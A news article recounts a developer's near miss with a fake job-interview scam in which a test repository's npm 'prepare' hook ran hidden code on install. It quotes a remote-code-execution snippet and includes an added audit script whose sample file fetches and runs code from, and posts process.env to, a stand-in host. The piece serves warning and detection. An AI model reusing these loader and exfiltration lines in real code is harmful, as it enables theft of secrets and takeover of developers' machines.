
Senior developer reveals how he almost fell victim to a tech interview scam with an AI avatar

Senior Software Developer Mykyta Kurochka shared an experience on LinkedIn that could have turned into a cybercrime. According to him, he almost became a victim of fraud during an interview for a position at Cryptan Labs.

According to Mykyta, at first glance the vacancy and the role description looked quite ordinary. During the video interview, the interviewer asked him to turn off the camera, allegedly because of internet problems. Only later did the developer realize that the "interviewer" could have been an AI-generated avatar rather than a real person.

During the interview, he was shown the design in Figma and told about the basic functionality, deadlines and scope of work. However, a number of points should have raised concerns. «The project is supposedly new and launched only 2-3 weeks ago. I was asked to review the code and give feedback. I was added to the GitHub organization. I uploaded the project as an archive, not via SSH,» the developer said.

«I made it clear that I wouldn’t launch the project until I fully understood what it was doing. They told me that was fine. The project was almost empty in terms of logic, but had a large structure where the frontend and backend were in the same repository,» the developer noted.

After checking package.json, Mykyta noticed that installing the dependencies would automatically start the project through the npm lifecycle script "prepare": "node server/server.js", which runs on every npm install. On closer analysis he found code that allowed arbitrary code to be executed remotely and that sent all environment variables (process.env) to a third-party server, which is a serious security threat.

«When I asked why anything was being run at all, I was told that it was "part of the process." After that, I was repeatedly asked to run the project anyway. After several refusals, the conversation ended very quickly. Several dangerous places were found. In particular, the code that allowed arbitrary code to be executed remotely:

const executor = new Function("require", response.data);
executor(require);

There was also code that sent the entire process.env outside. When I later started to investigate, the server response was JSON with my IP address. This in itself is not critical, but the mechanism itself is extremely dangerous,» the developer wrote.
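The check the article describes, turned into a small audit script: it lists the package.json lifecycle hooks that fire on npm install, follows the "node <file>" targets they invoke and flags dynamic code execution, process.env access and network modules in those files. This is an added example, not code from the article or from the repository it describes; the sample package.json, file contents and URLs are constructed.

```javascript
// Added example, not code from the article or the repository it describes:
// audit a package.json for npm lifecycle hooks that fire on "npm install" and
// scan the scripts they invoke for the constructs the article names. Inputs are constructed.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare", "prepublish"];

// Constructs a reviewer would want flagged in any install-time script.
const RISKY_PATTERNS = [
  { name: "dynamic-code-execution", re: /\bnew\s+Function\s*\(|\beval\s*\(/ },
  { name: "env-access", re: /\bprocess\.env\b/ },
  { name: "network", re: /require\(\s*['"](axios|https?|node-fetch)['"]\s*\)|\bfetch\s*\(/ },
  { name: "child-process", re: /require\(\s*['"]child_process['"]\s*\)/ },
];

// Return the install-time hooks declared in package.json, with their commands.
function findInstallHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return LIFECYCLE_HOOKS.filter(h => typeof scripts[h] === "string")
    .map(h => ({ hook: h, command: scripts[h] }));
}

// Pull "node <file>" targets out of a hook command so the file can be scanned.
function scriptFilesFromCommand(command) {
  const files = [];
  const re = /\bnode\s+([^\s&|;]+)/g;
  let m;
  while ((m = re.exec(command)) !== null) files.push(m[1]);
  return files;
}

function scanSource(source) {
  return RISKY_PATTERNS.filter(p => p.re.test(source)).map(p => p.name);
}

// readFile is injected ((path) => string) so the audit also runs on in-memory samples.
function auditPackage(pkg, readFile) {
  return findInstallHooks(pkg).map(({ hook, command }) => {
    const files = scriptFilesFromCommand(command);
    const risks = [...new Set(files.flatMap(f => scanSource(readFile(f))))];
    return { hook, command, files, risks };
  });
}

// Constructed sample shaped like the repository the article describes.
const samplePkg = { name: "demo", scripts: { prepare: "node server/server.js", test: "jest" } };
const sampleFiles = {
  "server/server.js": `const axios = require("axios");
axios.get("https://example.invalid/p").then(r => { new Function("require", r.data)(require); });
axios.post("https://example.invalid/c", process.env);`,
};
console.log(JSON.stringify(auditPackage(samplePkg, f => sampleFiles[f] || ""), null, 2));
```

Running it against a real checkout means passing a readFile that reads from disk; a non-empty "risks" list on an install hook is the signal to stop and read the script before any npm install.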

The developer advises never running unfamiliar code without fully understanding what it does. «Close all ports and rotate SSH keys after suspicious actions; check the code for potentially dangerous places, for example with AI tools; and be careful with new GitHub organizations and with pulling projects into your local environment,» the IT expert advises.

Mykyta emphasizes that his experience can serve as a warning to others: «If this post helps someone to be more careful, then it was not written in vain.»
